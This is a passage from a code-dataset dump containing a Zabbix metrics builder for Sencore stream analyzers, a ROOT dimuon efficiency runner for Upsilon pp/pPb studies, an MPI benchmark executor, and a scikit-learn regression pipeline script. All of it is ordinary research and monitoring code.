m_autodiscovery((analyzer_name, \"get_sid\", jdumps({\"data\": [{\"{#SID}\": _str_prep(sid)} for sid in mcast_sids]})))\n\n if raw_metrics.get(\"is_rgs\", False):\n for qts in raw_metrics[\"qam\"][\"tss\"]:\n qam_tss.add(qts)\n for qsvc in raw_metrics[\"qam\"][\"tss\"][qts][\"services\"]:\n qam_tss_sids.add(z_m(\"{qts}*SID-{qsid}\", qts=qts, qsid=qsvc))\n\n m_autodiscovery((analyzer_name, \"get_qam\", jdumps({\"data\": [{\"{#QAM}\": _str_prep(qam)} for qam in qam_tss]})))\n\n m_autodiscovery((analyzer_name, \"get_qam_sid\", jdumps({\"data\": [{\"{#QAM_SID}\": _str_prep(qam)} for qam in qam_tss_sids]})))\n\n for qts in raw_metrics[\"qam\"][\"tss\"]:\n ts_data = raw_metrics[\"qam\"][\"tss\"][qts]\n for p_name in (\n (\"current_bitrate\", \"net_bitrate\"),\n (\"max_centre_frequency_offset\", \"frequency_offset\"),\n (\"minSnr\", \"snr\"),\n (\"minMer\", \"mer\"),\n \"min_signal_level\", \"max_signal_level\", \"sid_count\"):\n if isinstance(p_name, tuple):\n p_real_name, p_name = p_name\n value = utils.get(ts_data, p_real_name)\n else:\n value = utils.get(ts_data, p_name)\n if isinstance(value, basestring):\n value = value.split(\" \")[0]\n metric = z_m(\"{p_name}_[{qts}]\", p_name=p_name, qts=qts)\n m_dynamic((analyzer_name, metric, value))\n\n for qsvc in raw_metrics[\"qam\"][\"tss\"][qts][\"services\"]:\n qsvc_data = raw_metrics[\"qam\"][\"tss\"][qts][\"services\"][qsvc]\n metric = z_m(\"pids_[{qts}*SID-{qsvc}]\", qts=qts, qsvc=qsvc)\n m_dynamic((analyzer_name, metric, qsvc_data[\"pid_count\"]))\n\n for p_name in (\"uptime\", \"bitrate\", \"cpu_temp\", \"free_mem\", \"free_disc\", \"port\", \"version\", \"time\",\n \"time_qam\", \"time_qam_diff\", \"time_eth\", \"time_eth_diff\"):\n\n m_static((analyzer_name, p_name, utils.get(raw_metrics, p_name)))\n\n 
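# Dynamic per-transport-stream metrics follow; each Zabbix item key embeds the stream (and service) id.\n 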
tss_data = raw_metrics.get(\"tss\", {})\n for ts in tss_data:\n ts_data = raw_metrics[\"tss\"][ts]\n for p_name in (\"net_bitrate\", \"cc_errors\",\n \"crc\", (\"mlrerr1m\", \"mlr\"), (\"iatPeak1m\", \"iat\")):\n\n if isinstance(p_name, tuple):\n p_real_name, p_name = p_name\n value = utils.get(ts_data, p_real_name)\n else:\n value = utils.get(ts_data, p_name)\n metric = z_m(\"{p_name}_[{ts}]\", p_name=p_name, ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_reciv\", False):\n value = utils.get(ts_data, \"scrambled\")\n metric = z_m(\"scrambled_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_scr\", False):\n value = utils.get(ts_data, \"not_existed\")\n metric = z_m(\"no_cktv_tabes_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n value = utils.get(ts_data, \"dst_addr\")\n metric = z_m(\"dst_addr_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_rgs\", False) :\n value = utils.get(ts_data, \"dst_addr\")\n metric = z_m(\"dst_addr_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n services_data = ts_data.get(\"services\", None)\n if not services_data:\n continue\n for svc in services_data:\n if svc == \"count\":\n continue\n svc_data = ts_data[\"services\"][svc]\n sid = svc_data[\"id\"]\n value = utils.get(svc_data, \"bitrate\")\n metric = z_m(\"net_bitrate_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_src\", False):\n value = svc_data.get(\"scrambled_ok\", \"NO_DATA\")\n metric = z_m(\"scramble_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if \"pids_ok\" in svc_data:\n value = utils.get(svc_data, \"pids_ok\")\n metric = z_m(\"no_cktv_pid_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if \"scrambled_ok\" in svc_data:\n value = utils.get(svc_data, \"scrambled_ok\")\n metric = z_m(\"scramble_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n return metrics","sub_path":"python/external-api/Sencore/lib/metrics_utils.py","file_name":"metrics_utils.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"543234787","text":"#!/usr/bin/env python3\n\nimport click\nimport datetime\nfrom subprocess import call\nfrom functools import partial\n\nshell_call = partial(call, shell=True)\n\ndef get_systematic_type(ctx, params, value):\n if value in ['Nominal', 'Binned']:\n return value\n elif ctx.params['collision_type'] == 'pPb':\n up_or_down = click.prompt(\"Upward or downward fluctuation?\", default='Up')\n return value, up_or_down\n else:\n systematic_type = click.prompt(\"What kind of TnP to use for pp systematics?\", default='Trigger')\n up_or_down = click.prompt(\"Upward or downward fluctuation?\", default='Up')\n return value, up_or_down, systematic_type\n\n\n@click.command()\n@click.option('--identifier',\n default=str(datetime.date.today()).replace('-', '_'),\n prompt='Folder name',\n help='Call the folder something logical')\n@click.option('--state', default='1S', prompt='Which Upsilon state?', help='Can be 1S, 2S, 3S or all_states')\n@click.option('--collision_type', default='pPb', prompt='Collision type',\n help='Can be pp or pPb') # Generalization to other collision types\n@click.option('--tnp_correction', default='Nominal', prompt='What TnP scale factors to use',\n callback=get_systematic_type,\n 
help='Can be Nominal, Systematics, Binned (Binned is only for pp)')\ndef run_efficiencies(identifier, state, collision_type, tnp_correction):\n if (not isinstance(tnp_correction, tuple)):\n up_or_down = None\n systematic_type = None\n elif len(tnp_correction) == 2:\n tnp_correction, up_or_down = tnp_correction\n systematic_type = None\n elif len(tnp_correction) == 3:\n tnp_correction, up_or_down, systematic_type = tnp_correction\n else:\n raise ValueError('You did not enter the right options for this collision type')\n\n if up_or_down is not None:\n identifier += up_or_down\n\n if (collision_type == 'pp') and (systematic_type is not None):\n identifier += systematic_type\n\n shell_call(f'mkdir eff_{collision_type}{identifier}')\n if state in ['1S', '2S', '3S']:\n state = int(state[0])\n run_one_state(state, collision_type, tnp_correction, identifier, systematic_type, up_or_down)\n elif state == 'all_states':\n for tmp_state in [1, 2, 3]:\n run_one_state(tmp_state, collision_type, tnp_correction,\n identifier, systematic_type, up_or_down)\n else:\n raise ValueError('Give it a state')\n\n\ndef run_one_state(state, collision_type, tnp_correction, identifier, systematic_type, up_or_down):\n if collision_type == 'pPb':\n ispPb = 1\n elif collision_type == 'pp':\n ispPb = 0\n else:\n raise ValueError('You did not specify pp or pPb')\n if (collision_type == 'pp') and (tnp_correction == 'Systematics') and (systematic_type is None):\n raise ValueError(\n 'You want systematic deviation due to tnp corrections for pp but did not specify the tnp type')\n if (tnp_correction == 'Systematics') and (up_or_down is None):\n raise ValueError('You forgot to specify upward or downward fluctuation')\n\n shell_call(f'cp dimuEff_RpA_ana.C dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/VVV/{state}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/WWW/{ispPb}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/XXX/{collision_type}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/tnp_choice/{tnp_correction}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/pp_tnp_sys_choice/{systematic_type or -1}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/RpA_ana/oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/TAG/{identifier}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/up_or_down/{up_or_down or -1}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'cp dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C eff_{collision_type}{identifier}/dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'root -l -q -b ./dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'rm dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n\n\nif __name__ == '__main__':\n 
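# click collects the CLI options declared above and dispatches them to run_efficiencies().\n 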
run_efficiencies()\n","sub_path":"Corrections/Efficiency/run_efficiencies.py","file_name":"run_efficiencies.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"397896449","text":"from collections import defaultdict, OrderedDict\nfrom os import getenv\nfrom re import findall\nfrom subprocess import call\n\nIS_IN_CLUSTER = True\nSIZES=[1, 2, 4]\nrun = 10\nMATH_FUNCTIONS=2\n\n\ndef run_commands(commands):\n command = \" && \".join(commands)\n print(command)\n return call(command, shell=True)\n\n\ndef clean():\n commands = [\n \"rm output.txt\",\n \"touch output.txt\"\n ]\n run_commands(commands)\n\n\ndef build():\n commands = [\n \"mrexec all rm -rf main.c\",\n \"mrexec all rm -rf math_function.h\",\n \"mrexec all rm -rf math_function.c\",\n \"mrexec all rm -rf main\",\n \"mrcp all main.c main.c\",\n \"mrcp all math_function.c math_function.c\",\n \"mrcp all math_function.h math_function.h\",\n \"mrexec all mpicc -o main main.c math_function.c -std=c11 -lm\",\n \"mpicc main.c math_function.c -o main -std=c11 -lm\"\n ]\n if not IS_IN_CLUSTER:\n commands = [\"mpicc main.c math_function.c -o main -std=c11 -lm\"]\n run_commands(commands)\n\n\ndef execute():\n for execution in SIZES:\n for func in range(MATH_FUNCTIONS):\n command = \"echo 'mpirun -np {} main 0 1 {}' >> output.txt\".format(execution, func)\n run_commands([command])\n command = \"mpirun -np {} -hostfile ../../host_file main 0 1 {} >> output.txt\".format(execution, func)\n run_commands([command])\n\n\ndef get_node_time(line, split_base):\n line = line.replace(\"{} (\".format(split_base), \"\")\n line = line.replace(\"):\", \"\")\n node, time = line.split(\" \")\n return int(node), float(time)\n\n\ndef build_head(head):\n values = findall(r'\\d+', head)\n nodes, _, _, function = [int(value) for value in values]\n return nodes, function\n\n\ndef resize():\n exp = 4\n for j in range(exp):\n for i in range(run - 1):\n SIZES.insert(j * run, 2 ** j)\n\n\ndef generate_metrics():\n arquive = open('output.txt')\n counts = defaultdict(int)\n nodes, function = build_head(next(arquive))\n counts[\"{}-{}\".format(nodes, function)] += 1\n data = defaultdict(dict)\n for line in arquive:\n line = line.strip()\n tag = None\n if \"Time-around-quad\" in line:\n tag = \"quad\"\n typo = \"Time-around-quad\"\n elif \"Time-total\" in line:\n tag = \"total\"\n typo = \"Time-total\"\n\n if tag:\n node, time = get_node_time(line, typo)\n key = \"{},{},{}\".format(nodes, function, node)\n if tag not in data[key]:\n data[key][tag] = 0.0\n data[key][tag] += time\n elif \"mpirun -np\" in line:\n nodes, function = build_head(line)\n counts[\"{}-{}\".format(nodes, function)] += 1\n\n print(\"nodes,function,node,quad,total,count\")\n for node, values in OrderedDict(sorted(data.items())).items():\n count = counts[\"{}-{}\".format(*node.split(\",\")[0:2])]\n print(\"{},{},{},{}\".format(node, values[\"quad\"]/count, values[\"total\"]/count,count))\n\n\nclean()\nbuild()\nresize()\nexecute()\ngenerate_metrics()\n","sub_path":"trabalho-2/trab1a/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386630319","text":"\"\"\"\nPURPOSE:\nMachine learning regression implemented in sci-kit learn. 
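A typical call (with a hypothetical feature file) might be:\n\tpython ML_regression.py -df features.txt -alg RF -gs T -p 4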
\n\nTo access pandas, numpy, and sklearn packages on MSU HPCC first run:\nexport PATH=/mnt/home/azodichr/miniconda3/bin:$PATH\n\nINPUTS:\n\t\n\tREQUIRED:\n\t-df Feature & class dataframe for ML\n\t-alg Available: RF, SVM (linear), SVMpoly, SVMrbf, GB, and Logistic Regression (LogReg)\n\t\n\tOPTIONAL:\n\t-y_name \tName of the column to predict (Default = Y)\n\t-apply\t String in Y column that indicates unknown values you want to predict. (Default = None)\n\t-sep Set separator for input data (Default = '\\t')\n\t-ho File with list of instances to holdout from feature selection\n\t-gs T/F if grid search over parameter space is desired. (Default = False)\n\t-normX\t\tT/F to normalize the features (Default = F (except T for SVM))\n\t-drop_na T/F to drop rows with NAs\n\t-cv # of cross-validation folds. (Default = 10)\n\t-cv_set \tFile with cv folds defined\n\t-n/-b\t\t\t# of times CV predictions are run (Default = 10)\n\t-p # of processors. (Default = 1, max for HPCC = 14)\n\t-tag String for SAVE name and TAG column in RESULTS.txt output.\n\t-feat Import file with subset of features to use. If invoked, -tag arg is recommended. Default: keep all features.\n\t-Y String for column with what you are trying to predict. Default = Y\n\t-save Adjust save name prefix. Default = [df]_[alg]_[tag (if used)].\n\t\t\t\t\t\t\tCAUTION: will overwrite!\n\t-short Set to True to output only the mean and std dev of prediction scores, default = full prediction scores\n\t-gs_full \tT/F Output full results from the grid search. (Default = F)\n\t-gs_reps Number of replicates of the grid search (Default = 10)\n\t-gs_type Full grid search or randomized search (Default = full, alt = random)\n\t-df2 File with class information. Use only if df contains the features but not the Y values \n\t\t\t\t\t\t\t* Need to specify what column in df2 is y using -y_name \n\t\n\tPLOT OPTIONS:\n\t-plots T/F Output a regression plot showing true vs. predicted Y\n\n\nOUTPUT:\n\t-SAVE_imp Importance scores for each feature\n\t-SAVE_GridSearch Results from parameter sweep sorted by the grid search score\n\t-SAVE_scores\t\t Mean predicted Y value & individual predictions from each -n\n\t-SAVE_results\t\t Detailed results from each model \n\t-RESULTS.txt \t\tAccumulates results from all ML runs done in a specific folder - use unique save names! 
XX = RF or SVC\n\n\"\"\"\n\nimport sys, os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport time\nimport ML_functions as ML\n\nstart_total_time = time.time()\ndef main():\n\t\n\t# Default code parameters\n\tn, FEAT, n_jobs, Y_col, plots, cv_num, TAG, SAVE, short_scores, OUTPUT_LOC = 100, 'all', 1, 'Y', 'False', 10, '', '', '', ''\n\ty_name, SEP, DF2, df_unknowns, apply_model , normX, normY, cv_reps, cv_sets = 'Y', '\\t', 'None', 'none','None', 'F', 'F', 10, 'none'\n\tdrop_na, ho = 'f', ''\n\t\n\t# Default parameters for Grid search\n\tGS, gs_score, GS_REPS, GS_TYPE, gs_full = 'f', 'neg_mean_squared_error', 10, 'full', 'f'\n\t\n\t# Default Random Forest and GB parameters\n\tn_estimators, max_depth, max_features, learning_rate = 500, 10, \"sqrt\", 1.0\n\t\n\t# Default Linear SVC parameters\n\tkernel, C, degree, gamma, loss, max_iter = 'rbf', 0.01, 2, 0.00001, 'hinge', \"500\"\n\t\n\t# Default Logistic Regression parameter\n\tpenalty, C, intercept_scaling = 'l2', 1.0, 1.0\n\t\n\tfor i in range (1,len(sys.argv),2):\n\t\tif sys.argv[i].lower() == \"-df\":\n\t\t\tDF = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-df2\":\n\t\t\tDF2 = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-y_name\":\n\t\t\ty_name = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-sep\":\n\t\t\tSEP = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-save':\n\t\t\tSAVE = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-feat':\n\t\t\tFEAT = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs\":\n\t\t\tGS = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_reps\":\n\t\t\tGS_REPS = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-gs_type\":\n\t\t\tGS_TYPE = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_full\":\n\t\t\tgs_full = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-normx':\n\t\t\tnormX = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_score\":\n\t\t\tgs_score = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-y\":\n\t\t\ty_name = sys.argv[i+1] # '-Y' is an alias for '-y_name' (see docstring)\n\t\telif sys.argv[i].lower() == \"-apply\":\n\t\t\tapply_model = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-b\" or sys.argv[i].lower() == \"-n\":\n\t\t\tcv_reps = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-drop_na\":\n\t\t\tdrop_na = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-ho':\n\t\t\tho = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-alg\":\n\t\t\tALG = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-cv\":\n\t\t\tcv_num = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-cv_set\":\n\t\t\tcv_sets = pd.read_csv(sys.argv[i+1], index_col = 0)\n\t\t\tcv_reps = len(cv_sets.columns)\n\t\t\tcv_num = len(cv_sets.iloc[:,0].unique())\n\t\telif sys.argv[i].lower() == \"-plots\":\n\t\t\tplots = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-tag\":\n\t\t\tTAG = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-out\":\n\t\t\tOUTPUT_LOC = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-n_jobs\" or sys.argv[i].lower() == \"-p\":\n\t\t\tn_jobs = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-short\":\n\t\t\tscores_len = sys.argv[i+1]\n\t\t\tif scores_len.lower() == \"true\" or scores_len.lower() == \"t\":\n\t\t\t\tshort_scores = True\n\n\tif len(sys.argv) <= 1:\n\t\tprint(__doc__)\n\t\texit()\n\t\n\t####### Load Dataframe & Pre-process #######\n\t\n\tdf = pd.read_csv(DF, sep=SEP, index_col = 0)\n\n\t# If features and class info are in separate files, merge them: \n\tif DF2 != 'None':\n\t\tstart_dim = df.shape\n\t\tdf_class = pd.read_csv(DF2, sep=SEP, index_col = 0)\n\t\tdf = 
pd.concat([df_class[y_name], df], axis=1, join='inner')\n\t\tprint('Merging the feature & class dataframes changed the dimensions from %s to %s (instance, features).' \n\t\t\t% (str(start_dim), str(df.shape)))\n\n\t# Specify Y column - default = Class\n\tif y_name != 'Y':\n\t\tdf = df.rename(columns = {y_name:'Y'})\n\n\t# Filter out features not in feat file given - default: keep all\n\tif FEAT != 'all':\n\t\tprint('Using subset of features from: %s' % FEAT)\n\t\twith open(FEAT) as f:\n\t\t\tfeatures = f.read().strip().splitlines()\n\t\t\tfeatures = ['Y'] + features\n\t\tdf = df.loc[:,features]\n\n\t# Check for Nas\n\tif df.isnull().values.any() == True:\n\t\tif drop_na.lower() == 't' or drop_na.lower() == 'true':\n\t\t\tstart_dim = df.shape\n\t\t\tdf = df.dropna(axis=0)\n\t\t\tprint('Dropping rows with NA values changed the dimensions from %s to %s.' \n\t\t\t\t% (str(start_dim), str(df.shape)))\n\t\telse:\n\t\t\tprint(df.columns[df.isnull().any()].tolist())\n\t\t\tprint('There are Na values in your dataframe.\\n Impute them or add -drop_na True to remove rows with nas')\n\t\t\tquit()\n\n\t# Set up dataframe of unknown instances that the final models will be applied to and drop unknowns from df for model building\n\tif apply_model != 'None':\n\t\tdf_unknowns = df[(df['Y']==apply_model)]\n\t\tpredictions = pd.DataFrame(data=df['Y'], index=df.index, columns=['Y'])\n\t\tdf = df.drop(df_unknowns.index.values)\n\t\tprint(\"Model built using %i instances and applied to %i unknown instances (see _scores file for results)\" % (len(df.index), len(df_unknowns.index)))\n\telse:\n\t\tpredictions = pd.DataFrame(data=df['Y'], index=df.index, columns=['Y'])\n\t\tprint(\"Model built using %i instances\" % len(df.index))\n\t\n\t# Make sure Y is datatype numeric\n\tdf['Y'] = pd.to_numeric(df['Y'], errors = 'raise')\n\n\t# Set up dataframe of holdout instances that the final models will be applied to\n\tif ho !='':\n\t\tdf_all = df.copy()\n\t\tprint('Removing holdout instances to apply model on later...')\n\t\twith open(ho) as ho_file:\n\t\t\tho_instances = ho_file.read().splitlines()\n\t\ttry:\n\t\t\tho_df = df.loc[ho_instances, :]\n\t\t\tdf = df.drop(ho_instances)\n\t\texcept:\n\t\t\tho_instances = [int(x) for x in ho_instances]\n\t\t\tho_df = df.loc[ho_instances, :]\n\t\t\tdf = df.drop(ho_instances)\n\telse:\n\t\tho_df = 'None'\n\t\tho_instances = 'None'\n\t\n\n\n\tif SAVE == \"\":\n\t\tif TAG == \"\":\n\t\t\tif OUTPUT_LOC == \"\":\n\t\t\t\tSAVE = DF + \"_\" + ALG\n\t\t\telse:\n\t\t\t\tSAVE = OUTPUT_LOC + '/' + DF + \"_\" + ALG\n\t\telse:\n\t\t\tif OUTPUT_LOC == \"\":\n\t\t\t\tSAVE = DF + \"_\" + ALG + \"_\" + TAG\n\t\t\telse:\n\t\t\t\tSAVE = OUTPUT_LOC + '/' + DF + \"_\" + ALG + \"_\" + TAG\n\t\n\t# Normalize feature data (normX)\n\tif ALG == \"SVM\" or normX == 't' or normX == 'true':\n\t\tfrom sklearn import preprocessing\n\t\ty = df['Y']\n\t\tX = df.drop(['Y'], axis=1)\n\t\tmin_max_scaler = preprocessing.MinMaxScaler()\n\t\tX_scaled = min_max_scaler.fit_transform(X)\n\t\tdf = pd.DataFrame(X_scaled, columns = X.columns, index = X.index)\n\t\tdf.insert(loc=0, column = 'Y', value = y)\n\n\t\t\n\tprint(\"Snapshot of data being used:\")\n\tprint(df.head())\n\n\tn_features = len(list(df)) - 1\n\t\n\t####### Run parameter sweep using a grid search #######\n\t\n\tif GS.lower() == 'true' or GS.lower() == 't':\n\t\tstart_time = time.time()\n\t\tprint(\"\\n\\n===> Grid search started <===\") \n\t\t\n\t\tparams2use, param_names = ML.fun.RegGridSearch(df, SAVE, ALG, gs_score, n, cv_num, n_jobs, GS_REPS, GS_TYPE, 
gs_full)\n\t\t\n\t\t# Print results from grid search\n\t\tif ALG.lower() == 'rf':\n\t\t\tmax_depth, max_features = params2use\n\t\t\tprint(\"Parameters selected: max_depth=%s, max_features=%s\" % (str(max_depth), str(max_features)))\n\t\n\t\telif ALG.lower() == 'svm':\n\t\t\tC, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s\" % (str(kernel), str(C)))\n\t\t\n\t\telif ALG.lower() == \"svmpoly\":\n\t\t\tC, degree, gamma, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s, degree=%s, gamma=%s\" % (str(kernel), str(C), str(degree), str(gamma)))\n\t\t\n\t\telif ALG.lower() == \"svmrbf\":\n\t\t\tC, gamma, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s, gamma=%s\" % (str(kernel), str(C), str(gamma)))\n\t\t\n\t\telif ALG.lower() == \"logreg\":\n\t\t\tC, intercept_scaling, penalty = params2use\n\t\t\tprint(\"Parameters selected: penalty=%s, C=%s, intercept_scaling=%s\" % (str(penalty), str(C), str(intercept_scaling)))\n\n\t\telif ALG.lower() == \"gb\":\n\t\t\tlearning_rate, max_depth, max_features = params2use\n\t\t\tprint(\"Parameters selected: learning rate=%s, max_features=%s, max_depth=%s\" % (str(learning_rate), str(max_features), str(max_depth)))\n\t\n\t\tprint(\"Grid search complete. Time: %f seconds\" % (time.time() - start_time))\n\t\n\telse:\n\t\tparams2use = \"Default parameters used\"\n\t \n\n\n\t####### Run ML models #######\n\tstart_time = time.time()\n\tprint(\"\\n\\n===> ML Pipeline started <===\")\n\t\n\tresults = []\n\tresults_ho = []\n\timp = pd.DataFrame(index = list(df.drop(['Y'], axis=1)))\n\n\n\n\t\t\n\tfor j in range(0,cv_reps): \n\t\tprint(\"Running %i of %i\" % (j+1, cv_reps))\n\t\trep_name = \"rep_\" + str(j+1)\n\t\t\n\t\t# Prime regressor object based on chosen algorithm\n\t\tif ALG.lower() == \"rf\":\n\t\t\treg = ML.fun.DefineReg_RandomForest(n_estimators,max_depth,max_features,n_jobs,j)\n\t\telif ALG.lower() == \"svm\" or ALG.lower() == 'svmrbf' or ALG.lower() == 'svmpoly':\n\t\t\treg = ML.fun.DefineReg_SVM(kernel,C,degree,gamma,j)\n\t\telif ALG.lower() == \"gb\":\n\t\t\treg = ML.fun.DefineReg_GB(learning_rate,max_features,max_depth,n_jobs,j)\n\t\telif ALG.lower() == \"logreg\":\n\t\t\treg = ML.fun.DefineReg_LinReg()\n\t\telse:\n\t\t\tprint('Algorithm not available...')\n\t\t\tquit()\n\n\t\t# Run ML algorithm.\n\t\tif ho != '':\n\t\t\tresult,cv_pred,importance,result_ho = ML.fun.Run_Regression_Model(df, reg, cv_num, ALG, df_unknowns, ho_df, cv_sets, j)\n\t\t\tresults_ho.append(result_ho)\n\t\telse:\n\t\t\tresult,cv_pred,importance = ML.fun.Run_Regression_Model(df, reg, cv_num, ALG, df_unknowns, ho_df, cv_sets, j)\n\t\t\n\t\tresults.append(result)\n\t\tpredictions[rep_name] = cv_pred\n\t\t\n\t\ttry:\n\t\t\timp[rep_name] = importance\n\t\texcept:\n\t\t\ttry:\n\t\t\t\timp[rep_name] = importance[0]\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot parse importance scores!\")\n\n\tprint(\"ML Pipeline time: %f seconds\" % (time.time() - start_time))\n\n\n\t\n\t####### Unpack ML results #######\n\ttimestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\tmses, evss, r2s, cors = [], [], [], []\n\tfor r in results:\n\t\tmses.append(r[0])\n\t\tevss.append(r[1])\n\t\tr2s.append(r[2])\n\t\tcors.append(r[3])\n\n\tMSE_stats = [np.mean(mses), np.std(mses), np.std(mses)/np.sqrt(len(mses))]\n\tEVS_stats = [np.mean(evss), np.std(evss), np.std(evss)/np.sqrt(len(evss))]\n\tr2_stats = [np.mean(r2s), np.std(r2s), np.std(r2s)/np.sqrt(len(r2s))]\n\tPCC_stats = [np.mean(cors), np.std(cors), np.std(cors)/np.sqrt(len(cors))]\n\n\t# 
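Each *_stats list holds [mean, std dev, standard error] across the CV repetitions.\n\t# 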
Get scores from hold out validation set:\n\tif ho != '':\n\t\tmses_ho, evss_ho, r2s_ho, cors_ho = [], [], [], []\n\t\tfor r in results_ho:\n\t\t\tmses_ho.append(r[0])\n\t\t\tevss_ho.append(r[1])\n\t\t\tr2s_ho.append(r[2])\n\t\t\tcors_ho.append(r[3])\n\n\t\tMSE_ho_stats = [np.mean(mses_ho), np.std(mses_ho), np.std(mses_ho)/np.sqrt(len(mses_ho))]\n\t\tEVS_ho_stats = [np.mean(evss_ho), np.std(evss_ho), np.std(evss_ho)/np.sqrt(len(evss_ho))]\n\t\tr2_ho_stats = [np.mean(r2s_ho), np.std(r2s_ho), np.std(r2s_ho)/np.sqrt(len(r2s_ho))]\n\t\tPCC_ho_stats = [np.mean(cors_ho), np.std(cors_ho), np.std(cors_ho)/np.sqrt(len(cors_ho))]\n\t\n\telse:\n\t\tMSE_ho_stats, EVS_ho_stats, r2_ho_stats, PCC_ho_stats = ['na', 'na', 'na'],['na', 'na', 'na'],['na', 'na', 'na'],['na', 'na', 'na']\n\n\n\t# Get average predicted value\n\tpred_columns = [c for c in predictions.columns if c.startswith('rep_')]\n\tpredictions.insert(loc=1, column = 'Mean', value = predictions[pred_columns].mean(axis=1))\n\tpredictions.insert(loc=2, column = 'stdev', value = predictions[pred_columns].std(axis=1))\n\n\tscores_file = SAVE + \"_scores.txt\"\n\tif short_scores == True:\n\t\t\tpredictions.to_csv(scores_file, sep='\\t', columns=['Y','Mean','stdev'])\n\telse:\n\t\tpredictions.to_csv(scores_file, sep='\\t')\n\n\t# Plot results\n\tif plots.lower() == 'true' or plots.lower() == 't':\n\t\tprint(\"\\nGenerating prediction plot\")\n\t\tpr = ML.fun.PlotsReg(predictions, SAVE)\n\t\t\n\t# Export importance scores\n\ttry:\n\t\timp['mean_imp'] = imp.mean(axis=1)\n\t\timp = imp.sort_values('mean_imp', 0, ascending = False)\n\t\timp_out = SAVE + \"_imp\"\n\t\timp['mean_imp'].to_csv(imp_out, sep = \"\\t\", index=True)\n\texcept:\n\t\tpass\n\n\trun_time = time.time() - start_total_time\n\n\t# Save to summary RESULTS file with all models run from the same directory\n\tif not os.path.isfile('RESULTS_reg.txt'):\n\t\tout2 = open('RESULTS_reg.txt', 